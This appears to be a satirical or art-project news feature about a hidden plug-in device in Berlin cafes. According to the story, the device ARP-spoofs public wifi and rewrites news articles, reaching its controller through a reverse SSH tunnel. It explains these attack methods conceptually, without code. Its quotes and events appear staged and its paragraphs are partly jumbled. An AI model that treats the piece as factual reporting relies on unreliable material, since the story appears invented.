Security researchers from Berlin-based firm, Critical Engineering, uncover the technology behind a small, seemingly harmless device that's causing havoc at hotspots throughout Europe. Lisa Miller reports from the German capital..
Many of us are familiar with this scene: starting the day with a muggachino while we catch up with news using the local wireless hotspot on our portable computer or smartphone.
This ritual practice, popular across cities throughout the western world, has recently come under threat however, from small, innocuous-looking devices 'infecting' cafes throughout Europe..
"I was checking an article I'd published the night before and noticed some bizarre irregularities. At first I thought they were typos but looking further I saw whole mis-citations of our Chancellor, Angela Merkel!
Embarrassed I called my office and they said it all looked fine. In a rush to leave I reached under the chair to pull out my laptop plug and accidentally knocked this little box to the floor. I plugged it back in and apologised to the cafe owners. They said they'd never seen it before.."
One cafe owner asked a friend if he new what it was. One thing led to another and soon enough the device was in the hands of local police who then called on Critical Engineering to unravel the mystery.
The device was hidden behind a chair at cafe Circus Lemke
The device opened up for inspection at Network Insecurity
The housing is around 12cm in length and has a 'passthrough' power socket, accepting a stock-standard Euro plug.
With such cheap components Kotla and his team were eager to find out just how the device worked. Plugging in cables to the TX, RX and GND pins they were able to communicate with the device using a Sparkfun USB Serial TTL module and a client-side program called minicom.
The 7x5cm board is an off the shelf GW-MF54G2 with an Atheros chipset, often sold as 'Planex' or 'Abocom', available for about EUR30.00 from numerous distributors worldwide.
"If it were plugged into the wall, say under a bench at a cafe, you'd think it was part of the infrastructure.." remarks Kotla
When plugged in the device boots up automatically, looking for an open wireless network or any network for which it already has a password - something often given for the price of a coffee. It then reverse SSH tunnels (using SSH keys) to a foreign server, allowing a remote user on that server to SSH back into the machine from afar, issuing commands as they see fit.
This however is just the beginning.
The device then performs a sophisticated modification of the Address Resolution Protocol (ARP) Table on both the hotspot hardware and the clients associated with it. These include iPhones, Android devices and laptop computers.
"They're using a 2048 bit SSH tunnel onion-routed over Tor nodes so there's no way in hell we can find out where they are when this thing's plugged in", quips Kotla disdainfully. "We've tried to SSH into the remote machine but our attempts are refused. They're essentially manipulating public perception of world events and facts, as reported by dedicated journalists, and there's not much we can do about it."
Kotla may be wrong here however: a Nokia N900 phone turned in at a police station in the area had a number of images of the device on board, along with these two photos, taken just minutes after one installation in a large Starbucks in the central suburb of Mitte, east Berlin. Note the black hat worn by what may be a colleague in the first photograph.
Berliner Zeitung political commentator Susanne Guthmann was puzzled to find her own article had been altered while at a West Berlin cafe.
What they encountered next surprised them indeed.
"If it were plugged into the wall, say under a bench at a cafe, you'd think it was part of the infrastructure.."
"It's nothing like anything we've ever encountered in the wild", says security expert Zdzislaw Kotla. "You plug it in near a hotspot, connect with your laptop or phone to the hotspot as normal and check the days facts. A lot of them prove to be manipulated. Someone, somewhere is sending those changes to this little soldier."
A snippet of code researchers managed to retrieve from the device
The ARP table on a computer network is special list cached by all devices on a network. Vital for network function, it couples actual hardware addresses with the network address issued by the access point. The table is updated by responses to ARP requests, special packets sent by devices on every Local Area Network. By responding to these requests with false mapping, the client can be tricked to believe it is conversing with the router -and vice versa- when in fact all traffic is passing through the rogue device.
The device becomes the puppet master of the local network, able to intercept and modify all content..
The last section of the boot sequence on the device. Note antagonistic prompt message.
1. 12000 yr old bong found in space debris. Have we looped?
2. U.K. satirist Chris Morris to be knighted.
3. First 'Thoughtography' exploit demoed at 27th Chaos Computer Club congress in Berlin.
4. Apple's new 'Think Similar' campaign sees mass adoption in Education Sector.
5. The Great American Metaphor:
why we can't stop saying "like" in every bloody sentence.
It all started in Berlin, when Susanne Guthmann, writer for the Berliner Zeitung, was catching up with a coffee and her own
article at Circus Lemke, a popular cafe in the western suburb of Neukölln.
"The board's running a customised version of a GNU/Linux distribution normally intended for use on routers and embedded systems. What they've done with it is crazy.."
The developers use a sophisticated form of attack to gain control of the local network.
Researchers give a detailed demonstration of the Newstweek device, altering BBC News on a Netbook, Apple Macbook and Nokia Smartphone. Note the ~15 seconds boot time before changes take effect. Our less patient readers should scroll to 04:45 to see the manipulation at work.